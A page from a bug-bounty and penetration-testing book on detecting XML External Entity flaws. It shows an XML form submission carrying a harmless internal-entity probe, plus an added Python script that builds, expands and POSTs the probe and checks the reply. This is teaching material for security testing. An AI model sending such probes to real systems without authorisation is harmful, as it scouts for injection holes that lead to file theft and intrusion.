Page 137 - Hands-On Bug Hunting for Penetration Testers
Detecting XML External Entities Chapter 7
After submitting the form, we head over to Burp to see what the intercepted raw
HTTP request looks like:
Seeing that the submission is formatted as XML, we can try a basic entity expansion
test: declare an internal entity named example in a DOCTYPE and substitute a reference
to it for the email form value. If the server-side parser resolves the reference, the
test message will appear wherever the email value is echoed back, which tells us the
parser processes a DTD we supply (the precondition for any external entity payload):
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY example "Success">]>
<root>
  <name>Edward Hawks</name>
  <tel></tel>
  <email>&example;</email>
  <password>roguemoon</password>
</root>
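The same probe, as an added Python example that is not part of the book's text: it builds the request body with the entity reference in the email field, shows locally (using the stdlib expat-based parser, which substitutes internal entities) what a resolving parser turns the field into, and includes a sender plus a heuristic check for the response. The TARGET URL, the form field names and the looks_expanded() heuristic are assumptions; the page does not give the endpoint or show the server's reply.

```python
import urllib.request
import xml.etree.ElementTree as ET

# Assumed endpoint; the page does not name the target URL.
TARGET = "http://localhost:8080/contact"


def build_probe(name, tel, password, entity_name="example", entity_value="Success"):
    """Return the XML body from the page with the email field replaced by a
    reference to an internal entity declared in the DOCTYPE."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE replace [<!ENTITY {entity_name} "{entity_value}">]>\n'
        "<root>\n"
        f"  <name>{name}</name>\n"
        f"  <tel>{tel}</tel>\n"
        f"  <email>&{entity_name};</email>\n"
        f"  <password>{password}</password>\n"
        "</root>\n"
    )


def expand_locally(body):
    """Parse the probe with xml.etree (expat underneath). expat substitutes
    internal entities, so this returns the value a resolving server-side
    parser would see in <email>: "Success" rather than "&example;"."""
    return ET.fromstring(body).findtext("email")


def looks_expanded(response_text, entity_name="example", entity_value="Success"):
    """Heuristic (assumed, not from the page): the submission succeeded if the
    substituted value is echoed back and the raw reference is not."""
    return entity_value in response_text and f"&{entity_name};" not in response_text


def send_probe(body, url=TARGET, timeout=10):
    """POST the probe as application/xml and return the response body.
    Requires a live target; everything else in this file runs offline."""
    req = urllib.request.Request(
        url,
        data=body.encode("utf-8"),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    probe = build_probe("Edward Hawks", "", "roguemoon")
    print(probe)
    # A parser that honours the internal DTD turns <email> into "Success".
    print("local expansion of <email>:", expand_locally(probe))
```

The internal entity is deliberately harmless: it only proves that the parser applies a DTD supplied in the request body. A parser that has DTD processing disabled (or that rejects the DOCTYPE outright) will echo the literal &example; or return an error, and the target is not worth pursuing for XXE through this field.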
Here's what it looks like when entered into our intercept proxy: